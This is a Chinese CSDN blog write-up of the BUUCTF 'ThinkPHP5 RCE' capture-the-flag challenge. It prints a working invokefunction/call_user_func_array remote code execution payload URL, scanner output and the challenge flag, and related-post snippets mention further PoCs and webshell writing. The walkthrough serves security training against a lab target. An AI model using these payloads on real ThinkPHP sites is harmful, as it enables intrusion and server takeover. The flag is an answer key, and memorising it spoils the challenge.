BUUCTF-Real-[ThinkPHP]5-Rce

最新推荐文章于 2024-05-28 18:22:36 发布
最新推荐文章于 2024-05-28 18:22:36 发布
阅读量858 收藏 9
点赞数 5
分类专栏: 漏洞复现与研究 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rx3225968517/article/details/135963003
版权

1、ThinkPHP检测工具

https://github.com/anx0ing/thinkphp_scan
漏洞检测

通过漏洞检测,我们发现存在rce漏洞!

2、漏洞利用

----
[!] Name: Thinkphp5 5.0.22/5.1.29 Remote Code Execution Vulnerability
    Script: thinkphp5022_5129.py
    Url: http://node5.buuoj.cn:27683/
      Vulnerable: True
      Attack: True
      Method: GET
      Payload: http://node5.buuoj.cn:27683/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=1
----
payload
http://node5.buuoj.cn:27683/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1 and it'll execute the phpinfo:
修改payload,我们就可以拿到phpinfo页面,flag就在其中!

至于扫描器,githb有很多!自己下载!

3、get flag

flag{9f4a1a0b-ef58-49ac-8344-63aa3914af75}
真的学不了一点。。。
关注
专栏目录
BUUCTF-thinkPHP5 RCE
朋克归零膏的博客
10-12 484
real题目我认为getflag是没意义的,幸运的是能从中学到一些技巧。在用大佬的poc对比官方的poc有一个细节。这题在尝试用命令执行写一句话的时候发现输入。,因此思路应该是将一句话分成两段然后拼一起。会被替换成空字符但是能单独写。
buuctf-Real-[ThinkPHP]5-Rce
weixin_46079186的博客
05-09 593
题目地址 是ThinkPHP v5这么有名的漏洞,直接网上找poc 找到poc 复制粘贴一下 可以执行phpinfo ,尝试执行以下其他命令 找了一会没找到,直接写了一个shell 进去找,linux shell脚本原因会过滤$_POST,所以要加\转义 使用蚁剑连接 找了半天,flag就在phpinfo里面。。。。。 ...
buuctf [ThinkPHP]5-Rce
qq_1873822的博客
03-14 1975
大佬们都是直接rce 这里漏洞技术细节(涉及代码段、原理等)我上个链接 https://blog.csdn.net/ArrowQin/article/details/105913146 https://bbs.ichunqiu.com/thread-48687-1-1.html?tdsourcetag=s_pcqq_aiomsg 解题 版本是ThinkPHP V5.0.20 poc ?s=index/\think\app/invokefunction&function=call_user_fun.
BuuCTF [Think php]5-Rce新手教程
最新发布
wwwyydshen的博客
05-28 465
这里避免新手踩坑我用红框框,框出了你所需要输入端口的地方,这里我们打开了页面,看到页面的第一反应就是查看一下它的源代码,这里我用的浏览器是主机上普通的浏览器,因为这道题不需要抓包所以咱们就简单点,不需要用kali也可以。flag居然藏在这里,藏的好深,得一直往下滑才能找到,哈哈别再傻傻的划着找了,找到键盘上的ctrl+f 上面会出现一个小框框直接搜flag就找到它了!在这里我们不要放过任何一个细节,我省略了找的过程,因为很麻烦但是我的建议还是多做尝试,尝试过后可以学到更多的东西。
BUUCTF之[ThinkPHP]5-Rce WP及getShell的新姿势
克格莫(有需要的私信)
10-10 3017
题目给了提示: https://github.com/vulhub/vulhub/blob/master/thinkphp/5-rce 照上面的POC做就能在phpinfo中找到flag,此处不再赘述。 拿到flag之后我想通过这个payload拿一波webshell,故使用以下POC写一句话,先创建一个php文件: http://xxxxxxxxx/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_
tp6-vue-admin:基于thinkphp6+vue2.6+element2.13 前后端分离落地解决方案
05-02
#thinkphp6+vue2.6+element2.13 前后端分离落地解决方案 本人开发环境版本信息: npm=6.13.4 vue =@vue/cli 4.1.2 node=v12.14.1 #注意1:vue-admin 中接口请求规则和动态路由,是对应tp6 中的接口规则和权限规则,...
thinkphp-2x-rce 1 代码执行
weixin_51558394的博客
08-17 500
thinkphp-2x-rce 代码执行
vuhub thinkphp-5-rce漏洞复现
qq_46804551的博客
04-24 602
搭建 your-ip:8080 搭建成功 漏洞复现 ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5中,由于框架错误地处理了控制器名称,因此如果网站未启用强制路由(默认设置),则该框架可以执行任何方法,从而导致RCE漏洞。 poc: 它将执行phpinfo /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
thinkphp-2x-rce 代码执行
weixin_46580614的博客
08-20 881
thinkphp-2x-rce 代码执行 漏洞描述 ​ ThinkPHP框架 - 是由上海顶想公司开发维护的MVC结构的开源PHP框架,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。 ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞 影响版本 Thinkphp 2.x的版本 实验环境 攻击机:win10 靶机:vulfocus平台 thinkphp-2x-rce
buuctf [ThinkPHP]5.0.23-Rce
qq_1873822的博客
03-14 1249
poc POST /index.php?s=captcha HTTP/1.1 Host: yuorip Accept-Encoding: gzip, deflate Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form.
BUUCTF-Real-ThinkPHP]5.0.23-Rce
分享
02-02 812
[ThinkPHP]5.0.23版本,RCE远程代码执行漏洞!
BUUCTF-Real-[ThinkPHP]IN SQL INJECTION
分享
02-05 1678
ThinkPHP5 SQL注入漏洞!
【buu-ThinkPHP-rce
lalalalafan的博客
11-15 2886
【buu-ThinkPHP5-rce1】 1.传参,查找flag即可 s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1 【buu-ThinkPHP2-rce】 index.php/Index/index/name${@phpinfo()} 【buu-ThinkPHP5.0.23-rce】 1. 执行命令poc POST /index
反序列化漏洞+ThinkPHP例工具使用+shiro例工具使用
NSQ0207的博客
08-03 689
在url栏上输入O:4:"Flag":1:{s:4:"file";protected属性被序列化后属性名长度会增加3,因为属性名会变成%00*%00属性名。private属性被序列化后属性名会变成%00类名%00属性名。O代表对象 因为我们序列化的是一个对象 序列化数组则用A来表示。这个方法会在一个对象被当作字符串时被调用,于是我们就能看到下面。s:4:"name" 字符串 属性值长度 属性值。运行11.php文件,获得序列化后的值。在vulhub文件内找到shiro漏洞。
ThinkPHP5 5.0.22/5.1.29 RCE
xhwfa的博客
05-02 3331
一、漏洞描述 ThinkPHP是一款运用极广的PHP开发框架。其版本5中,因为没有正确处理控制器名,致使在网站没有开启强制路由的状况下(即默认状况下)能够执行任意方法,从而致使远程命令执行漏洞。 二、影响版本 ThinkPHP 5.0系列 < 5.0.23 ThinkPHP 5.1系列 < 5.1.31 三、漏洞环境搭建 cd /vulhub-master/thinkphp/5-rce docker-compose up -d 访问192.168.110.134:8080,出现如
记录一次vulhub :Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞复现
sszsNo1的博客
06-29 250
vulhub :Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞复现
Thinkphp 5-rce 漏洞复现(vulhub)
MDSEC的博客
08-21 273
ThinkPHP其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。1.在虚拟机中拉去thinkphp 5-rce镜像。输出关于php的配置信息。执行命令 whoami。连接成功,说明存在漏洞。写入webshell。
红队渗透下的入口权限快速获取
m0_49936858的博客
08-12 849
此款扫描器支持thinkphp全版本,s2全版本,weblogic全版本的漏洞检测,并整合多个hvv高危漏洞,poc有的是网上收集有的是笔者自己编写,是很多扫描器的集合体,并且poc经过改动后误报率很低,能大大减少红队人员的手工验证漏洞时间。在信息收集时EHole是一款优秀的红队工具,它可以从大量杂乱的资产中找到这些易受攻击的系统,红队人员再利用对应组件的poc验证目标系统是否存在漏洞,以达到快速获取入口权限的目的。在真实的企业网络中内网往往是脆弱的,通过一个入口权限进入内网后往往可以上线大量内网机器。..
网络安全 | CTF】攻防世界 php_rce 解题详析
等风来
05-22 5956
PHP RCE 指的是通过远程代码执行漏洞(Remote Code Execution)来攻击 PHP 程序的一种方式。简单来说,由于PHP应用程序没有正确处理外部输入数据(如用户提交的表单、请求参数等),此时通过某些手段向 PHP 应用程序中注入恶意代码,然后通过这些恶意代码实现对受攻击服务器的控制。由上图可知,flag字段储存在flag文件夹下的flag文件中。使用thinkphp 5.1.payload进行尝试,根据提示,使用5.0.20版本的Payload。说明命令执行成功,接着抓取flag即可。
poc-yaml-thinkphp5023-method-rce poc1
07-29
poc-yaml-thinkphp5023-method-rce poc1 是一种潜在的安全漏洞利用程序,利用该程序可以对使用 ThinkPHP 5.0.23 版本的应用进行远程代码执行攻击。 ThinkPHP 是一款常用的 PHP 框架,版本 5.0.23 存在一个命令行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值